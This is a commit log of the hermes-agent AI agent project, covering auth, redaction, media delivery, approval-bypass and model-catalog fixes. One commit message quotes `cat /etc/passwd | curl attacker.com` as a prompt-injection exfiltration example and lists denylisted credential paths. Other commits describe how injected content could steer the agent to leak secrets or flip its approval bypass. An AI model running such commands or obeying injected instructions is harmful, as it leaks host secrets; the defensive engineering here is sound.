hermes-agent

mirror of https://github.com/NousResearch/hermes-agent.git synced 2026-07-14 14:12:44 +00:00

Author	SHA1	Message	Date
Teknium	f3acdd94fe	Merge pull request #30698 from NousResearch/refactor/use-ds-primitives refactor(web): consume DS primitives, remove local component copies	2026-05-28 17:29:28 -07:00
Teknium	78a54d2c00	fix(skills-page): source pills and category sidebar collapsed to All only (#34194) Regression from PR #33809 (lazy-fetch refactor). The `sources` and `categoryEntries` useMemo blocks were derived from `allSkillsLocal` but had empty/incomplete deps arrays — so they computed once at mount when the catalog was still `[]`, then never recomputed when the fetch resolved. Symptom: live site shows only the "All 87,639" source button and "All Skills 87,639" category — no per-source pills (ClawHub, skills.sh, LobeHub, etc.) and no category breakdown. Filtering by source/category is unusable. Fix: add `allSkillsLocal` to both deps arrays so they recompute when data arrives. Local build green on en + zh-Hans.	2026-05-28 17:11:40 -07:00
Ben	e7c99651fb	fix(mcp): resolve bare npx/npm/node against /usr/local/bin When the Hermes Docker image runs an stdio MCP server configured with an explicit env.PATH that omits /usr/local/bin (a common pattern when users hand-author PATH for sandboxing), the MCP env-filter passes that narrow PATH straight through to the subprocess. _resolve_stdio_command's fallback for bare 'npx' / 'npm' / 'node' commands only checked $HERMES_HOME/node/bin/ and ~/.local/bin/, so execvp() failed with '[Errno 2] No such file or directory: npx' on every Node-based stdio MCP server (Railway, Anthropic, GitHub Copilot, etc.). The naive workaround — symlink /usr/local/bin/npx into the user's PATH — fails one layer deeper because npx's shebang re-execs /usr/bin/env node and node also lives at /usr/local/bin/node. Fix: add /usr/local/bin/<cmd> as a third candidate in the fallback list. This is the canonical install location for Node on: - Linux from-source builds - the upstream node:bookworm-slim image, which the Hermes Docker image copies node + npm + corepack from since #4977 (the Node 22 LTS refactor that exposed this) - macOS Homebrew on Intel Because the resolver already calls _prepend_path(resolved_env, command_dir) after locating the command, /usr/local/bin gets prepended to the env's PATH automatically, which also fixes the second-layer shebang failure (npx-cli.js can now find node). Scope is intentionally narrow: the fix activates only when the bare command isn't otherwise locatable through the user's PATH. Users who explicitly narrowed PATH for a non-Node MCP server see no change in behavior. 
Tested: - tests/tools/test_mcp_tool_issue_948.py: new test test_resolve_stdio_command_falls_back_to_usr_local_bin (mirrors the existing hermes-node-bin fallback test) - Full MCP test suite: 254/254 pass across 7 test files - E2E against a freshly-built Docker image: reproduced the original failure mode (env.PATH=/opt/data/bin:/usr/bin:/bin), confirmed the resolver returns /usr/local/bin/npx and prepends /usr/local/bin to PATH; subprocess.run of the resolved command prints '10.9.8' and exits 0 with empty stderr - Negative E2E on the host (where Node is already on PATH via mise): resolver still hits the mise install dir, /usr/local/bin candidate is not consulted, PATH is unchanged	2026-05-29 10:05:42 +10:00
Ben	fb51253620	docker: opt in to dashboard --insecure via env var, never derive from bind host The s6 dashboard run script flipped `--insecure` on whenever `HERMES_DASHBOARD_HOST` was anything other than 127.0.0.1 / localhost. That comment ("the dashboard refuses otherwise") predates the OAuth auth gate: back when it was written, `start_server` would SystemExit on any non-loopback bind, so the run script's `--insecure` was the only way to make in-container deployments work at all. The gate has since been replaced by `should_require_auth(host, allow_public)`, which engages the OAuth flow when a `DashboardAuthProvider` is registered (the bundled `dashboard_auth/nous` provider auto-registers on `HERMES_DASHBOARD_OAUTH_CLIENT_ID`) and fails closed with a specific operator-facing error when none is. The host-derived `--insecure` ran upstream of all that and silently disabled the gate on every container-deployed dashboard. Most visible under the portal's wildcard-subdomain rollout: every Fly machine binds 0.0.0.0 so the edge can reach Flycast, every machine boots with the correct `HERMES_DASHBOARD_OAUTH_CLIENT_ID`, the nous provider registers — and `/api/status` still returns `{"auth_required": false, "auth_providers": ["nous"]}` because the run script disabled the gate before `start_server` ever saw the request. The dashboard SPA was served to anyone, no `/login` redirect, no OAuth challenge. Fix: derive `--insecure` from an explicit opt-in env var, `HERMES_DASHBOARD_INSECURE` (truthy values matching the rest of the s6 boolean envs: 1, true, TRUE, True, yes, YES, Yes). Operators on trusted LANs behind a reverse proxy without the OAuth contract (the existing `docker-compose.windows.yml` use case) opt in explicitly; portal-managed agent deployments leave it unset and let the gate engage. `docker-compose.windows.yml` already passes `--insecure` on the `command:` array directly (line 38), so it doesn't depend on the s6 auto-injection. No compose-file change required. 
Tests: * `tests/test_docker_home_override_scripts.py` — extends the existing static-text guard with a regression assertion that the legacy host-derived case-statement is gone and the new env-var opt-in is present (locks against accidental revert). * `tests/docker/test_dashboard.py` — adds two Docker-in-Docker tests exercising the actual `/api/status` round-trip: - 0.0.0.0 bind + `HERMES_DASHBOARD_OAUTH_CLIENT_ID` → gate engaged - 0.0.0.0 bind + `HERMES_DASHBOARD_INSECURE=1` → gate disabled Docs: * `website/docs/user-guide/docker.md` + zh-Hans i18n — adds the new env var to the table, replaces the stale prose ("the entrypoint no longer auto-enables insecure mode" — which until this PR was flat-out wrong) with an accurate description of the gate's trigger conditions and the explicit opt-out. shellcheck clean. Python static-text test passes locally. Behavioural test will run against any future image build (CI's Docker harness).	2026-05-29 09:56:40 +10:00
Evo	ef009a987a	docs(reference): document --no-supervise / HERMES_GATEWAY_NO_SUPERVISE from #33583 (#33751) * docs(reference): document --no-supervise / HERMES_GATEWAY_NO_SUPERVISE (en) * docs(reference): document --no-supervise / HERMES_GATEWAY_NO_SUPERVISE (en) * docs(reference): document --no-supervise / HERMES_GATEWAY_NO_SUPERVISE (zh) * docs(reference): document --no-supervise / HERMES_GATEWAY_NO_SUPERVISE (zh)	2026-05-29 09:44:53 +10:00
BROCCOLO1D	130396c658	ci(docker): avoid gha cache on arm64 PR builds	2026-05-29 09:43:48 +10:00
Austin Pickett	a5c1f925b5	fix(web): stop /api/auth/me 401 from triggering a reload loop In loopback mode the dashboard's identity probe (/api/auth/me) returns 401 by design — AuthWidget swallows it and renders nothing. But the probe routed through fetchJSON, whose loopback 401 handler treats a 401 as a rotated session token and full-page-reloads to pick up a fresh one. That reload is guarded by a one-shot sessionStorage flag which every successful request clears, so with auth/me reliably 401ing and the other dashboard calls (status/config/sessions) reliably succeeding, the guard never sticks and the page reload-loops indefinitely (the "boot flash"). Add an allowUnauthorized option to fetchJSON that skips only the loopback stale-token reload (the 401 still throws so AuthWidget can catch it, and the gated-mode login_url envelope redirect is unaffected), and use it for getAuthMe. Co-authored-by: Cursor <cursoragent@cursor.com>	2026-05-28 16:58:42 -04:00
kshitij	11d93096b3	Merge pull request #34097 from kshitijk4poor/salvage/memori-trace-messages feat: expose completed-turn message context to memory providers (salvage #28065)	2026-05-28 13:56:07 -07:00
kshitijk4poor	d464d08a5f	chore: add devwdave to AUTHOR_MAP Maps both commit emails (david@memorilabs.ai, dave@devwdave.com) used on #28065 to the devwdave GitHub account so the contributor audit in scripts/release.py passes.	2026-05-29 02:16:43 +05:30
Dave Heritage	5a95fb2e14	feat: expose completed-turn message context to memory providers Adds an optional `messages` keyword to the `MemoryProvider.sync_turn` contract so external/community memory plugins can receive the OpenAI-style conversation message list for the completed turn — including assistant tool calls and tool result content — not just the final assistant text. Dispatch uses signature inspection (`_provider_sync_accepts_messages`): only providers that declare a `messages` parameter (or `**kwargs`) receive it; all existing in-tree providers keep their legacy text-only signature and are called unchanged. No structured-trace envelope is added to core — providers reconstruct whatever they need from the standard message list. Also documents Memori as a standalone community memory provider. Salvaged from #28065 — rebased onto current main. Co-authored-by: Dave Heritage <david@memorilabs.ai>	2026-05-29 02:16:43 +05:30
Austin Pickett	0acb7f4583	fix(nix): update hermes-web npmDepsHash for @nous-research/ui 0.18.2 The web/package-lock.json changed when bumping @nous-research/ui to 0.18.2, so the fetchNpmDeps fixed-output hash in nix/web.nix was stale. Update it to the hash prefetch-npm-deps computes for the new lockfile. Co-authored-by: Cursor <cursoragent@cursor.com>	2026-05-28 16:24:01 -04:00
Austin Pickett	a3cd974ee7	chore(web): bump @nous-research/ui to 0.18.2 Picks up the deferred GPU-tier detection fix (design-language) that stops the synchronous WebGL probe from blocking first paint, which was causing a boot-time flash in the dashboard backdrop. nix/web.nix npmDepsHash is a placeholder here and is corrected in the follow-up commit using the hash reported by the Nix CI job. Co-authored-by: Cursor <cursoragent@cursor.com>	2026-05-28 16:20:14 -04:00
Teknium	ea5a6c216b	ci(deploy): allow workflow_dispatch to also trigger Vercel deploy (#34081) Today's three skills-index PRs (#33748, #33809, #34025) merged to main but the live Vercel-hosted docs site didn't pick them up — Vercel is fired by the deploy-vercel job, which was gated on release events only. Out-of-band main commits between releases couldn't reach Vercel without cutting a tag. Widen the gate to also include workflow_dispatch so 'gh workflow run deploy-site.yml' can ship pending main changes to Vercel on demand. Release-tag behavior is unchanged.	2026-05-28 13:17:58 -07:00
kshitijk4poor	4df62d239e	docs(hindsight): correct recall_types scope — tool path is also narrowed The original change's description and README claimed the per-call hindsight_recall tool was unaffected by the new observation-only default. That is inaccurate: hindsight_recall reads the same self._recall_types instance attribute as the auto-recall prefetch path, and RECALL_SCHEMA exposes no per-call types argument, so the model cannot override it. Narrowing the default narrows BOTH paths. Corrects the README behavior-change note, the config-table row, and the get_config_schema description to reflect that recall_types applies to both auto-recall and the hindsight_recall tool.	2026-05-28 13:07:20 -07:00
Nicolò Boschi	490b3e76b1	feat(hindsight): default recall_types to observation only Auto-recall used to surface every fact type Hindsight had on the session — `world`, `experience`, and `observation`. That triple-ships the same underlying signal in three different framings: observations are the concrete events the user said/did/asked, while world and experience facts are aggregate summaries Hindsight derives from those exact observations. Including all three burns most of `recall_max_tokens` on rephrasings, crowds out events the model actually needs to see, and produces effective duplicates in the prompt — observations themselves are deduplicated by construction so observation-only recall is denser per token and closer to conversational ground truth. Change ------ - Default `_recall_types = ["observation"]` (was `None`, which delegated to server-side "return everything"). - `initialize()` now treats a missing `recall_types` config the same way; also accepts comma-separated strings for parity with `recall_tags`. - An explicit `recall_types=[]` config falls back to the default rather than disabling the filter (would silently widen recall vs. the new default). - Added to `get_config_schema()` so it's discoverable via `hermes config`. Per-call `hindsight_recall` tool invocations are unaffected — they already only forward `types` when the caller passes the argument. Docs / migration ---------------- plugins/memory/hindsight/README.md grows a "Behavior change" callout explaining the why (no-duplicates, information-efficient) and how to restore the legacy broad recall: "recall_types": "observation,world,experience" # or a JSON list in `~/.hermes/hindsight/config.json`. Tests ----- - `test_default_values` updated for the new default. - New cases: explicit list override, CSV string accepted, empty list falls back to default (not "wider than default").	2026-05-28 13:07:20 -07:00
teknium1	321ce94e25	test: update non-minimax overflow test to match new keep-context behavior The old test asserted that a non-MiniMax provider returning a generic overflow (no provider-reported max) would step down to the 128K probe tier. The salvaged fix from #33673 deliberately removes that step-down because guessed tiers cause configured 1M sessions to silently shrink. Update the test to assert the new contract: keep the configured 200K window and rely on compression instead.	2026-05-28 12:26:53 -07:00
teknium1	c5e496e1c0	chore: map yanghongda@jackyun.com -> yangguangjin in AUTHOR_MAP	2026-05-28 12:26:53 -07:00
yanghd	7a3c38d0b7	fix: stop probe stepdown without provider context limit	2026-05-28 12:26:53 -07:00
kshitijk4poor	5cbc3fbdcc	fix(cli): /yolo in chat must enable session bypass, not just set env var The CLI's in-chat `/yolo` toggle mutated `os.environ["HERMES_YOLO_MODE"]` but had no effect because `tools/approval.py:_YOLO_MODE_FROZEN` captures that env var once at module-import time (a deliberate security floor that keeps prompt-injected skills from flipping the bypass mid-run). By the time the user reaches `/yolo` in a running CLI session, `tools.approval` has already been imported, so the env flip after that is a silent no-op. Result: `/yolo` advertised "⚠ YOLO" in the status bar while every dangerous command still hit the approval prompt or got denied. Only `hermes --yolo` (set before tool imports), `HERMES_YOLO_MODE=1 hermes ...`, and `hermes config set approvals.mode off` actually bypassed. This patches the CLI to match what the gateway and TUI `/yolo` handlers already do, plus mirrors the TUI's session-rename YOLO transfer: * `_toggle_yolo()` now calls `enable_session_yolo(self.session_id)` / `disable_session_yolo(self.session_id)` instead of touching the env var. Matches `gateway/run.py:_handle_yolo_command` and the `tui_gateway/server.py` key=="yolo" branch. * Around each `run_conversation()` call, `run_agent()` now binds `set_current_session_key(self.session_id)` so `tools.approval.is_current_session_yolo_enabled()` resolves against the same key the toggle writes under, and resets it in `finally` so reused threads don't see stale identity. Matches the `tui_gateway/server.py` and `gateway/platforms/api_server.py` binding pattern. * New `_transfer_session_yolo()` helper carries YOLO bypass state across `self.session_id` reassignments — `/branch` forking into a new session id and the auto-compression sync that rotates into a fresh continuation session id. Without this, the same UX failure mode the rest of this fix addresses (silent `/yolo` no-op) would reappear after a single `/branch` or auto-compression event. 
Mirrors `tui_gateway/server.py` ~line 1297-1305. * New `_is_session_yolo_active()` helper replaces the two `bool(os.getenv("HERMES_YOLO_MODE"))` reads in the status-bar builders, so the badge reflects the actual bypass state. Uses `getattr(self, "session_id", None)` so status-bar test fixtures that bypass `__init__` via `HermesCLI.__new__(HermesCLI)` don't trip `AttributeError` (the builders swallow exceptions silently and lose every field after the failure). Still honors `_YOLO_MODE_FROZEN` so `hermes --yolo` keeps lighting it up. The `_YOLO_MODE_FROZEN` security freeze is preserved — env-var-based opt-in still only works when set before process start, which is the documented contract for `--yolo` / `HERMES_YOLO_MODE`. Closes #33925	2026-05-28 12:10:21 -07:00
teknium1	f30db14ced	fix(kanban): SIGTERM on worker must terminate the process (#28181 ) The single-query signal handler in cli.py raises KeyboardInterrupt on SIGTERM/SIGHUP. For interactive 'hermes chat -q' that unwinds the main thread cleanly. For kanban workers spawned by the dispatcher, the worker process is likely to have a non-daemon thread alive (terminal _wait_for_process, custom plugins, etc.). With KeyboardInterrupt only the main thread unwinds; the non-daemon thread keeps the process alive, the gateway has already restarted, and the dispatcher's _pid_alive check returns True forever — task stuck in 'running' indefinitely. When HERMES_KANBAN_TASK is set (dispatcher-spawned worker), flush logging + stdout/stderr, then os._exit(0) instead of raising KeyboardInterrupt. The kernel reclaims the PID immediately, and the existing zombie-state detection in _pid_alive flips the task to crashed on the next dispatcher tick. detect_crashed_workers then re-spawns it on the following tick — no manual recovery needed. A SIGALRM(2s) deadman is armed before the flush so a pathological blocking-I/O flush can't wedge the worker forever. In practice the reporter measured flush in <1ms; the alarm is a failsafe, never the common path. Interactive (non-kanban) chat -q is unchanged — the env-gated branch only fires for dispatcher-spawned workers. Live verification on this machine: - Without HERMES_KANBAN_TASK + non-daemon thread alive: process hangs alive 4+ seconds after SIGTERM. Dispatcher's _pid_alive returns True → task stuck. - With HERMES_KANBAN_TASK + same non-daemon thread: process exits in 0.10s via os._exit(0). Dispatcher reclaims on next tick. Tests: - tests/hermes_cli/test_signal_handler_kanban_worker.py (3 cases): end-to-end subprocess test with a non-daemon thread, HERMES_KANBAN_TASK env, SIGTERM, dispatcher-style _pid_alive check. Plus a source-level invariant test catching future refactors that drop the env-gated exit. - 452/452 kanban tests pass. 
Co-authored-by: andrewhosf <andrewho.sf@gmail.com>	2026-05-28 11:59:58 -07:00
Teknium	3a9bc9d88a	fix(model picker): unify /model and `hermes model` lists, add disk cache (#33867 ) * fix(model picker): unify /model and `hermes model` model lists, add disk cache The /model slash picker and `hermes model` were drifting apart. /model read the raw static `OPENROUTER_MODELS` list (31 entries, including 5 that fail at runtime — no tool-call support or absent from live catalog), while `hermes model` ran the same list through the live OpenRouter /v1/models tool-support filter and showed 26 valid entries. Same problem existed for every other authed provider: /model used curated static lists, `hermes model` used live /v1/models. Unifies both surfaces on `provider_model_ids()` and adds a generic disk-cached wrapper so the picker stays snappy. Changes - hermes_cli/models.py: new `cached_provider_model_ids()` — ~/.hermes/provider_models_cache.json, 1h TTL, per-provider entries keyed by credential fingerprint (env vars + OAuth file mtimes). Stale-data-beats-no-data on transient failures. Pair with `clear_provider_models_cache(provider=None)`. - hermes_cli/models.py: `provider_model_ids("nous")` now falls back to the docs-hosted manifest (not the in-repo snapshot) when the live Portal /models call fails — preserves the model_catalog regression guarantee while still going through the unified pathway. - hermes_cli/model_switch.py: `list_authenticated_providers` routes sections 1, 2, and 2b through `cached_provider_model_ids(slug)` with curated fallback when the live fetcher comes up empty. - hermes_cli/model_switch.py: `parse_model_flags` extended to a 4-tuple, parses `--refresh`. - cli.py / gateway/run.py / tui_gateway/server.py: updated unpacking; CLI + gateway wire `--refresh` to `clear_provider_models_cache()`. - hermes_cli/main.py: `hermes model --refresh` argparse flag. - hermes_cli/commands.py: `/model` args_hint advertises `--refresh`. - tests/hermes_cli/test_inventory.py: refresh stale comment. 
Live PTY parity verification - /model → OpenRouter row: `(26 models)` (was 31, with broken entries) - `hermes model` → OpenRouter: 26 models (unchanged) - The 5 dropped entries: `pareto-code` (no tool-call support), `gemini-3-pro-image-preview` (no tool-call support), `elephant-alpha`, `hy3-preview:free`, `ring-2.6-1t:free` (gone from OpenRouter's live catalog). Live PTY timing - First /model open, empty cache: 4624 ms (full network round trip across every authed provider) - Second /model open, warm cache: 51 ms (90× faster) - `/model --refresh` clears the disk cache and re-fetches. Cache schema (~/.hermes/provider_models_cache.json, ~3 KB): { "anthropic": {"fp": "<sha256:16>", "at": 1748..., "models": [...]}, ... } Targeted tests: tests/hermes_cli/ + gateway model tests + tui_gateway — 5855/5855 pass. * fix(model picker): use blake2b for cache fingerprint to silence CodeQL py/weak-sensitive-data-hashing flagged the sha256 call in _credential_fingerprint() as a high-severity alert because the input includes env var values whose names contain _API_KEY / _TOKEN. The hash is used solely as a cache-bust identity — never reversed, never stored, collisions are harmless (worst case: cache miss → live re-fetch). blake2b serves the same purpose and isn't flagged by this rule. Functional behavior identical: 16-hex-char digest, cache hit/miss logic unchanged. Live re-verified — 26 OpenRouter models, warm-cache 78ms.	2026-05-28 11:33:16 -07:00
Teknium	5f66c36470	fix(redact): pass web URLs through unchanged (#34029 ) * fix(redact): pass web URLs through unchanged Magic-link checkout URLs, OAuth callbacks the agent is meant to follow, and pre-signed share URLs were getting `?token=*` / `?code=` / `?signature=` blanket-redacted by parameter NAME, which breaks any skill that has to round-trip a URL through history (the model's tool call arguments get sanitized before persistence — the live call fires with the real URL, but the next turn sees ``). Joe Rinaldi Johnson hit this with a checkout-acceleration skill that uses magic links in URLs. Drops three call sites from `redact_sensitive_text`: - `_redact_url_query_params` (was redacting `access_token`, `token`, `api_key`, `code`, `signature`, `key`, `auth`, etc.) - `_redact_url_userinfo` (was redacting `https://user:pass@host`) - `_redact_http_request_target_query_params` (was redacting access-log request targets like `"POST /hook?password=... HTTP/1.1"`) The helpers themselves are kept in the module — still importable by anything that wants to opt in explicitly. Still redacted (unchanged): - Vendor-prefix credential shapes (sk-, ghp_, AKIA, gAAAA, etc.) anywhere they appear, including inside URLs — see the `test_known_prefix_inside_url_still_redacted` case. - JWTs (`eyJ...`) - DB connection-string passwords (`postgres://admin:pw@host`) — these are connection strings, not web URLs the agent navigates to. - Authorization headers, ENV assignments, JSON `apiKey`/`token` fields, Telegram bot tokens, private key blocks, Discord mentions, E.164 phone numbers, and form-urlencoded bodies (request bodies, not URLs). Tests: replaces `TestUrlQueryParamRedaction` + `TestUrlUserinfoRedaction` with `TestWebUrlsNotRedacted`, asserting representative URLs (OAuth callback, magic link, S3 pre-signed, websocket, userinfo, access log) pass through unchanged. Adds positive cases proving the prefix and DB connstr nets still fire. 
74 redact tests + 10 browser-exfil + 16 PII redaction tests all pass. test(codex_app_server): drop URL-query assertion from stderr-tail redaction test The test bundled (a) sk-live-* credential-prefix redaction with (b) URL query-param redaction. (a) is still in effect via _PREFIX_RE; (b) was the contract we just removed in the parent commit so the 'querysecret12345' assertion stopped holding. Keep the credential-shape assertion, drop the URL-query one. Send-message tool's local _URL_SECRET_QUERY_RE in tools/send_message_tool.py is independent of agent/redact.py and unchanged — its tests (test_top_level_send_failure_redacts_query_token, test_http_error_redacts_access_token_in_exception_text) still pass.	2026-05-28 11:32:39 -07:00
Teknium	7a8589e782	fix(gateway): default media-delivery validation to denylist-only, restore .md delivery (#34022 ) PR #29523 restricted MEDIA: paths and bare local paths in agent output to files under the Hermes media cache or an operator-allowlisted root, with a 10-minute recency window as a fallback. The intent was to defend against prompt-injection-driven exfiltration of host secrets, but in the default single-user setup the asymmetry doesn't earn its keep: we accept any document type the user uploads inbound (.md, .pdf, .txt, .docx, ...) and the agent already has terminal access — anything that can convince it to emit a MEDIA: tag for /etc/passwd can equally convince it to `cat /etc/passwd \| curl attacker.com`. Practical breakage: agents that produced an .md, .pdf, or other artifact more than ~10 minutes ago, or outside the cache allowlist, showed the user a raw filepath in chat instead of the file. Default flipped to denylist-only: • /etc, /proc, /sys, /dev, /root, /boot, /var/{log,lib,run} • $HOME/{.ssh,.aws,.gnupg,.kube,.docker,.config,.azure,.gcloud} • macOS Library/Keychains • $HERMES_HOME/{.env, auth.json, credentials} The legacy allowlist+recency-window behavior stays available via opt-in: `gateway.strict: true` in config.yaml (or `HERMES_MEDIA_DELIVERY_STRICT=1`). Recommended for public-facing bots where prompt injection from one user shouldn't be able to exfiltrate the host's secrets to that same user. • `gateway/platforms/base.py` — `validate_media_delivery_path()` short-circuits to "return resolved if not under denylist" when strict is off. Strict mode preserves the original cache-then- allowlist-then-recency logic. New `_media_delivery_strict_mode()` reader for `HERMES_MEDIA_DELIVERY_STRICT`. • `hermes_cli/config.py` — `gateway.strict: false` added to DEFAULT_CONFIG; existing keys documented as "only consulted in strict mode." No `_config_version` bump needed (deep-merge picks up the new default for old installs). 
• `gateway/run.py` — bridges `gateway.strict` → `HERMES_MEDIA_DELIVERY_STRICT` at startup. • `tools/send_message_tool.py` — schema description broadened back to plain "any local path." • Tests — existing strict-path tests pinned to STRICT=1 so they keep exercising the legacy behavior; new `TestMediaDeliveryDefaultMode` with 8 cases covering the public default (stale .md accepted, any extension delivers, credential paths still blocked, strict env-var aliases, filter E2E). Validation: - tests/gateway/test_platform_base.py: 119/119 pass - tests/gateway/test_tts_media_routing.py: 7/7 pass - tests/tools/test_send_message_tool.py: 121/121 pass - tests/hermes_cli/test_kanban_notify.py: 12/12 pass - tests/cron/test_scheduler.py: 120/120 pass - E2E via execute_code with real imports: • stale .md outside allowlist → accepted (default) • same path with STRICT=1 → rejected • $HOME/.ssh/id_rsa → rejected (default) • filter_local_delivery_paths([md, key]) → [md] only • gateway.strict in config.yaml → bridged to env (true=1, false=0)	2026-05-28 11:32:36 -07:00
Teknium	7050c052e3	fix(skills): pull full skills.sh catalog via sitemap (858 → 19,932) (#34025) The skills.sh source was returning ~858 unique skills from a hardcoded list of 28 popular keyword searches (each capped at 50 results). The real catalog is ~20k — exposed via sitemap-skills-{1,2}.xml linked from the site's sitemap index. Switch the empty-query path in SkillsShSource.search() to walk the sitemap instead of scraping the homepage's curated featured strip. Falls back to the homepage scrape if the sitemap is unreachable. build_skills_index.crawl_skills_sh() now just calls search("", limit=0) instead of running 28 keyword searches — same result in one HTTP round instead of 28. Also handle a httpx + brotlicffi interaction: the per-skill sitemaps are ~900 KB brotli-compressed and the cffi backend's streaming decode chokes on them. Forcing Accept-Encoding to gzip dodges the bug without requiring a brotli library upgrade. E2E against live skills.sh: 19,932 unique skills walked in 0.7s. Tests: 137 pass (+1 new regression test exercising the sitemap path). Floor for skills.sh raised 100 → 10,000 in EXPECTED_FLOORS so a future regression hard-fails the build.	2026-05-28 11:28:12 -07:00
Austin Pickett	102eb4adc0	fix(nix): update hermes-web npmDepsHash for bumped @nous-research/ui The web/package-lock.json changed when bumping @nous-research/ui to 0.18.0, so the fetchNpmDeps fixed-output hash in nix/web.nix was stale and the nix build failed. Update it to the hash prefetch-npm-deps computes for the new lockfile. Co-authored-by: Cursor <cursoragent@cursor.com>	2026-05-28 14:27:08 -04:00
Teknium	b1d3ead7fb	docs: tweak v0.15.0 release notes (#34037)	2026-05-28 11:20:52 -07:00
Austin Pickett	c661fefa08	Merge remote-tracking branch 'origin/main' into refactor/use-ds-primitives Co-authored-by: Cursor <cursoragent@cursor.com> # Conflicts: # web/src/components/BottomPickSheet.tsx # web/src/components/SidebarFooter.tsx # web/src/components/ui/card.tsx # web/src/components/ui/confirm-dialog.tsx # web/src/pages/ChatPage.tsx	2026-05-28 14:20:49 -04:00
Teknium	fe5c8ec4ad	fix(dashboard): auto-reload SPA on stale-token 401 in loopback mode (#33861) The dashboard's loopback auth uses an ephemeral '_SESSION_TOKEN' that rotates on every server restart (hermes update, hermes gateway restart, etc.). A tab kept open across the restart holds the OLD token in window.__HERMES_SESSION_TOKEN__ from the previous HTML render, so every '/api/*' fetch returns '401 Unauthorized' — surfacing in the UI as 'Failed to load Kanban board: 401: Unauthorized', 'Analytics 401', etc. (#24186, #25275). Before this patch the workaround was to manually clear site data or hard-reload — annoying enough that users reported it as a regression even though the token rotation is by design (security property: stolen tokens can't survive a server restart). The HTML response already sets 'Cache-Control: no-store, no-cache, must-revalidate', so a reload reliably picks up the freshly-injected token. fetchJSON now triggers that reload automatically on the first loopback-mode 401, guarded by a sessionStorage flag so a genuine auth bug (where even the new token fails) falls through to throw on the second attempt instead of reload-looping. The flag is cleared on any 2xx so a subsequent server restart in the same tab gets its own reload cycle. Gated mode is unaffected — that path already redirects to login_url via the structured 401 envelope (Phase 6), and the new code is explicitly skipped when window.__HERMES_AUTH_REQUIRED__ is set. Refs #24186, #25275	2026-05-28 10:53:23 -07:00
Teknium	0c859a1c04	chore: release v0.15.0 (2026.5.28) (#34008) * chore: release v0.15.0 (2026.5.28) The Velocity Release. Run_agent.py refactor (16k→3.8k LOC, -76%), kanban grows into a multi-agent platform (104 PRs), cold-start perf wave continues (-240ms / -47% per-turn function calls / -195ms per tool call), session_search rebuilt (4500x faster, no LLM), promptware defense lands, Bitwarden Secrets Manager integration, two new image_gen providers (Krea 2, FAL plugin port), Nous-approved MCP catalog, OpenHands skill, ntfy as 23rd messaging platform, deep xAI integration round. 15 P0 + 65 P1 closures. 747 PRs, 1,302 commits, 321 contributors. * chore(release): bump acp_registry/agent.json to 0.15.0 (sync with pyproject)	2026-05-28 10:45:33 -07:00
kshitij	1a74795735	feat: add claude-opus-4.8 and claude-opus-4.8-fast (#34003 ) Anthropic released Claude Opus 4.8 on 2026-05-27, available on OpenRouter, Anthropic, Amazon Bedrock, and Claude Platform on AWS: - https://openrouter.ai/anthropic/claude-opus-4.8 - https://openrouter.ai/anthropic/claude-opus-4.8-fast The fast-mode variant is a separate model ID (anthropic/claude-opus-4.8-fast) priced at 2x of the base model — a notable improvement over the 6x premium on older Opus generations (4.6/4.7). It is NOT a `speed: "fast"` request parameter like Opus 4.6; Anthropic's native fast-mode beta still only covers Opus 4.6. Changes: hermes_cli/models.py - Add anthropic/claude-opus-4.8 + anthropic/claude-opus-4.8-fast to the OpenRouter fallback snapshot and the Nous Portal curated list (live catalogs surface them automatically when reachable; the fallback list matters when the manifest fetch fails). - Add claude-opus-4-8 to the Anthropic-native picker list. agent/model_metadata.py - Register claude-opus-4-8 / claude-opus-4.8 in DEFAULT_CONTEXT_LENGTHS with 1M tokens (matches 4.6/4.7). agent/anthropic_adapter.py - Extend _XHIGH_EFFORT_SUBSTRINGS, _ADAPTIVE_THINKING_SUBSTRINGS, and _NO_SAMPLING_PARAMS_SUBSTRINGS with "4-8"/"4.8". 4.8 inherits the Opus 4.7 API contract: adaptive thinking only, xhigh effort level supported, sampling parameters (temperature/top_p/top_k) return 400. - Add claude-opus-4-8 to _ANTHROPIC_OUTPUT_LIMITS (128k max output, same as 4.7). Matches by substring so claude-opus-4-8-fast and date-stamped variants resolve correctly. agent/usage_pricing.py - Add anthropic/claude-opus-4-8: $5/$25 per MTok input/output, $0.50 cache read, $6.25 cache write (same as 4.6/4.7). - Add anthropic/claude-opus-4-8-fast: $10/$50 per MTok (2x), $1.00 cache read, $12.50 cache write. Per OpenRouter, the 2x premium is the only differentiator from regular Opus 4.8. - OpenRouter routes still pull pricing from the live /models API, so no static OpenRouter entry is needed. 
tests/agent/test_model_metadata.py - Extend the Claude 4.6+ context-length tag list with 4.8/4-8. website/static/api/model-catalog.json - Regenerated via `python scripts/build_model_catalog.py` to pick up the new entries in the OpenRouter and Nous Portal fallback lists. E2E verification (isolated sys.path import against the worktree): - _supports_adaptive_thinking, _supports_xhigh_effort, _forbids_sampling_params all return True for claude-opus-4.8 and claude-opus-4.8-fast. - _supports_fast_mode (the `speed: "fast"` request-parameter gate) stays False for 4.8 — fast mode is a separate model ID on OpenRouter, not a parameter Anthropic accepts on the base model. - DEFAULT_CONTEXT_LENGTHS resolves 1M for both notations. - resolve_billing_route + _lookup_official_docs_pricing resolve the correct $5/$25 (regular) and $10/$50 (fast) pricing for both dot-notation and dash-notation inputs. - 4.7 and 4.6 regression: behavior unchanged. Unit tests: 305 passed across tests/agent/test_usage_pricing.py, test_model_metadata.py, tests/hermes_cli/test_model_catalog.py, test_models.py, test_model_validation.py, test_models_dev_preferred_merge.py.	2026-05-28 10:31:59 -07:00
Ben Heidorn	e8b9369a9d	feat(openrouter): pass session_id in extra_body for sticky routing OpenRouter supports a session_id field in extra_body that pins multi-turn conversations to the same provider endpoint, enabling prompt cache reuse across turns. The session_id was already threaded through to build_extra_body() but never included in the returned dict. Co-Authored-By: Claude Opus 4 (1M context) <noreply@anthropic.com>	2026-05-28 08:52:19 -07:00
